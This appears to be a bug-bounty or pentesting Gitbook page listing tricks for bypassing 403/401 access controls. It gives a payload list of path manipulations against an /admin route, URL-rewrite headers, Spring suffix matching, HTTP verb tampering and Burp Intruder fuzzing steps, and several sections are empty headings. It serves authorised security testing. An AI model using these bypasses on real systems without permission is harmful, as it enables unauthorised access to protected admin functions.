Bypass 403 / 401
Various bypass tricks and tools
/admin -> 403 or 302
/Admin
/AdMin
/admin/
/admin/.
//admin//
/.;/admin
/./admin/..
/admin.json
/;/admin
//;//admin
/admi%6e [n is url encoded to %6e]
/%2e/admin
/admin#
/admin;/
/admin/~
/./admin/./
/admin?param
/admin..;/
/admin%20
/admin%09
/admin/..;/
/static../admin.jsp
/admin..;/
/../admin
/..;/admin
X-Originial-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

Capitalize the path
Request to /ADMIN/DELETEUSER may still be mapped to the /admin/deleteUser
Add Suffix
URL encoding
Spring framework
If Spring framework have enabled the useSuffixPatternMatch option, a request to /admin/deleteUser.anything would still match the /admin/deleteUser pattern.
Prior to Spring 5.3, this option is enabled by default.
API - IDOR
IDORGit
If a path with .git/ = 403, then /.git/config might be 200!
Wordpress
X-Rewrite-Url Header can be used to bypass WordPress 403 pages.
Burp Extensions - 403 Bypasser

HTTP Verb Tampering
HTTP Verb TamperingChange request method from GET to TRACE, etc.

Change method like this way:
If the application supports method override header then you can also test like this way:
Fuzz
Payload List
Set Up Burp Suite Intruder:
Open Burp Suite and navigate to the Intruder tab.
Send your request to Intruder by right-clicking on it in the Proxy tab and selecting Send to Intruder.
Configure the Intruder positions by selecting the directory or path you want to bypass.
Load the Payloads:
Copy the payloads from the provided wordlist.
Paste the payloads into the Payload Options input field in the Intruder tab.
Payload Processing:
Below the Payload Options section, locate the Payload Processing tool.
Click the Add button to open a new window.
Select the rule Replace String.
Replace the placeholder
{base}with the base value you want to use for bypassing.
Disable URL Encoding:
Uncheck the option URL-encode these characters to ensure the payloads are not altered.
Start the Attack:
Click Start Attack and observe the results.
Look for requests that return a 200 status code, indicating a successful bypass.

Content-Length:0
403 Header Bypass
Parameter Tampering
Secret Trick: Override parameters with conflicting values:
Null Byte Injection
HTTP Version Downgrade
Bypass Origin
Tools
Go-recon - gr-403:
Resources
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated
